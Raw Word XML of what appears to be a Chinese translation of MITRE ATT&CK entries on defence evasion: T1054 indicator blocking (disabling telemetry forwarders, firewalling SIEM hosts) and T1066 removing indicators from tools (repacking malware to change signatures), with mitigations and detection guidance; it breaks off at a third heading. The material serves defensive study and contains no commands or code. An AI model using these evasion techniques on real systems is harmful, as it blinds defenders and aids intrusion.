    <w:p w14:paraId="097428E3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指示信号拦截</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1555" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8181"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="374D4B2B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="485150E0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1054</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="729874FE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DCD2963" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22B99136" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>传感器健康和状态、进程命令行参数、进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44047AB7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防病毒，日志分析，主机入侵防御系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE49DDC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId107" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-571</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F8909E4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B497435" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFBE8F3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会试图阻止收集和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常由传感器捕获的指示或事件，包括修改存储在配置文件和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或注册表项中的传感器设置，从而禁用或恶意重定向事件遥测。如果指标信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是通过网络上报的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，攻击者可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>阻断上报</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>躲避</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中心分析。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这可以通过多种方式来实现，例如停止负责转发遥测的本地进程和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或创建基于主机的防火墙规则来阻断到负责聚合事件的特定主机的通信，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SIEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（安全信息和事件管理）产品。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2487FF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="05B02D30" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="768213AE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7739F670" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="523CD8FA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52C23FB6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和目录权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01130894" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保事件跟踪器</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>转发器、防火墙策略和其他相关机制已通过适当的权限和访问控制进行了保护。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="6B01309A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="035CC60B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>软件配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19263D0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑定期（例如，临时、登录时）自动重启转发机制，以及对防火墙规则和其他相关系统配置实施适当的更改管理。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="79A726EE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27B28114" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="060E9CEF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保事件跟踪器</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>转发器、防火墙策略和其他相关机制已通过适当的权限和访问控制进行了保护，并且不能由用户账号操控。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C8D7BD0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD39E12" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23640BA2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测主机传感器是否缺少报告活动。不同的阻塞方式可能会导致不同的报告中断形式。系统可能会突然停止报告所有数据或仅报告某些类型的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501EF954" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据收集的主机信息的类型，分析人员可能会检测到触发进程停止或连接阻断的相关事件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4FDD30" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD0865">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除工具中指标</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9736"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="4E187240" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45E553D4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC663C">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve"> T1066</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09CDBA3F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="346EA847" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC663C">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="143A77C6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC663C">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程使用网络，进程监控，进程命令行参数，杀毒软件，二进制文件元数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2211A173" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：日志分析</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机入侵防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>杀毒软件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="196B8D4D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EC663C" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00EC663C">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC663C">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AE3F2B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35E24A4A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C56B49" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00C56B49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果检测到恶意工具并隔离或以其他方式缩减，攻击者也许能够确定恶意工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56B49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测到的原因（指示器），通过删除指示器修改该工具，并使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56B49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56B49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标的防御系统或可能使用类似系统的后续目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所能探测到的更新后的版本</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56B49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4548D87E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00C56B49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这方面的一个好例子是，当恶意软件检测到文件签名，并通过防病毒软件隔离。可以确定恶意软件因其文件签名而隔离的攻击者可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56B49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC663C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件打包</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56B49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56B49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或以其他方式修改文件，使其具有不同的签名，然后重复使用恶意软件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A62AEC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC96EB5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C56B49">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于系统功能的滥用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA900D3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07918E39" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00660EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首次检测到恶意工具可能会触发防病毒或其他安全工具警报。通过网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00660EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00660EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、电子邮件扫描设备等，也可能在边界上发生类似事件。初始检测应视为潜在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地</w:t>
      </w:r>
      <w:r w:rsidRPr="00660EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更具侵入性的入侵迹象。警报系统应彻底调查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以找出</w:t>
      </w:r>
      <w:r w:rsidRPr="00660EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>超出初始警报未检测到的活动。假设不会调查单个事件（如防病毒检测）或分析人员无法将该事件与网络上发生的其他活动进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结论性地联系起来</w:t>
      </w:r>
      <w:r w:rsidRPr="00660EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则攻击者可能会继续执行操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7609E603" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CA01F7" w14:textId="2FD9B082" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00972FDA" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机上指示</w:t>
      </w:r>
